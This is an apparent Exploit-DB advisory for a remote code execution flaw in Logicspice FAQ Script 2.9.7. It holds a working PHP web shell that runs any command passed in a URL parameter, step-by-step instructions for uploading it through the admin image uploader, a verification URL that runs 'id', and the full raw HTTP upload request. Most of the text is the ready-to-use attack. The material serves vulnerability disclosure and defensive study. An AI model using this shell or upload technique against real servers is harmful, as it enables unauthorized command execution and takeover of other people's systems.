Logicspice FAQ Script 2.9.7 - Remote Code Execution

EDB-ID:

45326

CVE:

N/A


Author:

AkkuS

Type:

webapps


Platform:

PHP

Date:

2018-09-04


# Exploit Title: Logicspice FAQ Script 2.9.7 - Remote Code Execution
# Dork: N/A
# Date: 2018-09-03
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.logicspice.com/products/faq-script
# Software Link: https://www.logicspice.com/app/webroot/files/document/phpmyfaq-2.9.7.zip
# Version: 2.9.7
# Category: Webapps
# Tested on: Kali linux

# Description : Logicspice FAQ Script 2.9.7 allows to upload arbitrary files which 
# leads to a remote command execution on the remote server.

# 1) Create a file with the below PHP code and save it as .php

<?php $cmd=$_GET['cmd']; system($cmd); ?>

# 2) Login to FAQ Script admin portal as priviliage user
# 3) At the left hand side go to Manage FAQ --> List FAQ (http://domain/admin/faqs)
# 4) Click at the Actions button of a current FAQ product --> Edit
# 5) Click (Image) button on Content panel.
# 6) Chose Upload section and browse your .php file.
# 7) Finaly click "Send it to Server". Script will give you a link belong to
# our php file.
# 8) verift the exploit:
# http://domain/webroot/files/uploadimages/e90a3_shell.php?cmd=id

# The request:

POST
/admin/faqs/faqimages?CKEditor=faqs-answer&CKEditorFuncNum=1&langCode=en
HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://server/admin/faqs/edit/eine-frage-fuer-onkel-peter
Cookie: __asc=3c88bfff1659e6148e6168c52d2;
__auc=3c88bfff1659e6148e6168c52d2; _ga=GA1.2.696297698.1535960501;
_gid=GA1.2.2097449566.1535960501; __zlcmid=oDhc8xpdUQvf8W;
admin_username=logicspice; admin_password=faqscript_admin;
CAKEPHP=omckos7rsug4u3e1k3uebi7ma5; PHPSESSID=be29d40p12q20gtpvlea8esp23
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
boundary=---------------------------1036720403269880351068202740
Content-Length: 267
-----------------------------1036720403269880351068202740
Content-Disposition: form-data; name="upload"; filename="shell.php"
Content-Type: application/x-php

<?php $cmd=$_GET['cmd']; system($cmd); ?>
-----------------------------1036720403269880351068202740--